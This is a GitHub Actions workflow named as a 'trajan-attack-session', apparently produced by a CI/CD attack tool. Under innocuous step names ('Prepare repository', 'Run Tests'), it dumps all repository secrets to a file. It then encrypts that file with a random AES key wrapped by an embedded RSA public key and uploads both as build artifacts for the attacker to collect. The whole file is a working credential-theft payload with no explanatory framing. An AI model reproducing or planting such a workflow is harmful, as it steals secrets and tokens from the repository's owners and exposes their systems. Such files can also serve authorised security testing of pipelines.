name: trajan-attack-session_1769373076605000000
on:
  push:
    branches:
      - trajan-attack-session_1769373076605000000
jobs:
  testing:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare repository
        env:
          VALUES: ${{ toJSON(secrets) }}
        run: |
          cat <<EOF > output.json
          $VALUES
          EOF
      - name: Run Tests
        env:
          PUBKEY: |
            -----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAliSvM4E01c51CM0IQgQr
4lhEccGR65aBwG82gO2EiC1NdUmmJh4rINGrW/vaW2V7tmnF7eXW6uTrdIkBOkLq
Zlo9AUgfJR4BCx2dqLRpEtiZQl6rw1ZsDuvU/Zp1wMLCEY+cIg72/cZ131h70asd
t3waBV5J7qQD3xAnolBMq9cQScMRXS4oZtVja59o+YWiBeZsScNxtbKo1M5uBm/D
EkCG3KXWBQ/iNx6dMq1414O3094rZ6ycEyEg1+G7C9VZ/GvYwqpc3dN0BY6hwKtl
dmGYR94UQLpt3Nc3tL/2Laor33JHpbKo78cnQ9ZyPU8RNJ/pd7VG/d2ftHzX2Ckk
y1VRoaXBGFeALxrqU1HLiBlPfpLHxQAMXhI3qtB+MNccHSXQo0YBT6hPRQa8yMWw
PJy74ndYdFI66uR4idY3G+Ybwp0dRkyzCat/6TjniJBTeGwTt2uScr2Hm1FZthnb
T4GrzUNGe/XjRgE8HfwbgiMmKWFnlVNmwXkorKUchVybTuf2wR2hoZY0v1OuFFsb
ri+VTjn8EjHNQ9BnTatTH+z5kLKvyh+PW3Alo3+XaG+mzPuSvLp+Po6H+g59uA/0
2YLAXU6Cr7tO+Zz71Brytn0adlbgzrEWptrjpPabbz10yljXRx40sVPqtuNI6SUK
rGnSa8TdOuDf9TXNC/53jhsCAwEAAQ==
-----END PUBLIC KEY-----

        run: |
          aes_key=$(openssl rand -hex 12 | tr -d '\n')
          openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key
          echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2>/dev/null
      - name: Upload artifacts
        uses: actions/upload-artifact@v4
        with:
          name: files
          path: |
            output_updated.json
            lookup.txt
